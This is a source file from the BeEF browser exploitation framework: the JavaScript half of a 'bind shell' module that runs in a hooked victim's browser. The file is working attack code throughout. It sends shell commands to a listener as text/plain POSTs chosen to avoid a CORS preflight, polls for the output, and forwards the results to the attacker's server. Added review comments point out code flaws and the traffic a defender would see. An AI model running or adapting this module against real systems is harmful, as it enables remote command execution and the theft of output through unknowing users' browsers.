beef/modules/exploits/beefbind/beef_bind_shell/command.js


//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
// Browser-side half of the module: the callback passed to beef.execute()
// drives an HTTP conversation with a listener at rhost:rport and forwards
// everything it reads back through beef.net.send().
//
// Flow, as written below: get_prompt() -> send_command(cmd) ->
// get_additional_cmd_results() repeated every 500 ms until a read comes
// back empty.
//
// What this looks like from the defending side (all visible in this file):
//  - plain-HTTP GET and POST requests issued by the browser itself to
//    rhost:rport, so on the network they originate from the browser's host;
//  - a POST body of the form "cmd=<command>\r\n" sent as text/plain;
//  - console.log() output of prompts and command results in the page console.
beef.execute(function () {
// The <%= ... %> markers are server-side template placeholders, so this file
// is not valid JavaScript until it has been rendered.
// NOTE(review): the values land inside single-quoted JS string literals;
// whether they are escaped for that context is not visible here - confirm
// in the module's server-side code.
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var path = '<%= @path %>';
var cmd = '<%= @cmd %>';
// Scheme is fixed to http://; host, port and path are concatenated as given.
var uri = "http://" + rhost + ":" + rport + path;
// Return the part of `output` that precedes the first NUL character
// (char code 0), or all of `output` if it contains none.
// NOTE(review): assigned without var/let/const, so this becomes an implicit
// global (and would throw in strict mode).
// NOTE(review): for...in over a string walks its index keys; it would also
// visit any enumerable property a page has added to String.prototype, which
// would skew `offset`. output.indexOf("\0") expresses the same intent.
strip_output = function(output){
var offset = 0;
for(var c in output){
// `c` is reused: first the index key, then the character at that index.
c = output.charAt(c);
if(c.charCodeAt(0) == 0){
break;
}
offset++;
}
return output.substring(0,offset);
};
// Number of non-empty follow-up reads forwarded so far (used in log lines only).
var counter = 0;
// Poll the listener with a GET; forward any non-empty output and schedule
// another poll 500 ms later. An empty read ends the polling chain.
// NOTE(review): implicit global. The string form of setTimeout() below is
// evaluated in global scope, so it only works because this name is global.
get_additional_cmd_results = function(){
// NOTE(review): `xhr` is also an implicit global, shared by all three
// request functions in this file.
xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){
if(xhr.readyState == 4){
var result = strip_output(xhr.responseText);
console.log("result.length: " + result.length);
if(result.length != 0){
console.log("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result);
// beef.net.send() is defined elsewhere; presumably it reports the data back
// to the framework server for this command id - TODO confirm.
beef.net.send("<%= @command_url %>", <%= @command_id %>, result);
counter++;
// String argument => evaluated like eval(); a function reference would avoid that.
setTimeout("get_additional_cmd_results()",500);
}
}else{ // readyState != 4: only logged. (The "no more results" case is the empty read above, which does nothing.)
console.log("get_additional_cmd_results - readyState != 4: request [" + counter + "]");
}
};
// Third argument `false` makes the request synchronous: send() blocks the
// page's main thread until the listener answers.
xhr.open("GET", uri, false);
xhr.send(null);
};
// First step: GET the listener's initial output (logged as the "prompt"),
// forward it, then submit the configured command.
get_prompt = function () {
xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){
if(xhr.readyState == 4){
console.log("get_prompt: Retrieved prompt");
var prompt = strip_output(xhr.responseText);
console.log(prompt);
beef.net.send("<%= @command_url %>", <%= @command_id %>, prompt);
// Prompt received; now submit the command.
send_command(cmd);
}
};
xhr.open("GET", uri, false);
xhr.send(null);
};
// POST `command` to the listener as "cmd=<command>\r\n", forward the response,
// then start polling for further output after 500 ms.
send_command = function(command){
xhr = new XMLHttpRequest();
// NOTE(review): unlike the other two handlers there is no readyState check,
// so this runs on every state change and forwards whatever responseText
// holds at that moment, which may be empty.
xhr.onreadystatechange = function(){
var cmd_result = strip_output(xhr.responseText);
console.log(cmd_result);
beef.net.send("<%= @command_url %>", <%= @command_id %>, cmd_result);
};
xhr.open("POST", uri, false);
// text/plain is one of the content types browsers send cross-origin without
// a CORS preflight, so a service listening on a reachable host:port cannot
// rely on a preflight to keep a POST like this from arriving.
xhr.setRequestHeader("Content-Type", "text/plain");
// The command is concatenated into the body as-is, with no encoding.
command = "cmd=" + command + "\r\n"; // trailing CRLF is required; per the original author the shellcode otherwise returns "More?"
xhr.send(command);
setTimeout("get_additional_cmd_results()",500);
};
// Entry point: start the prompt -> command -> poll sequence.
get_prompt();
});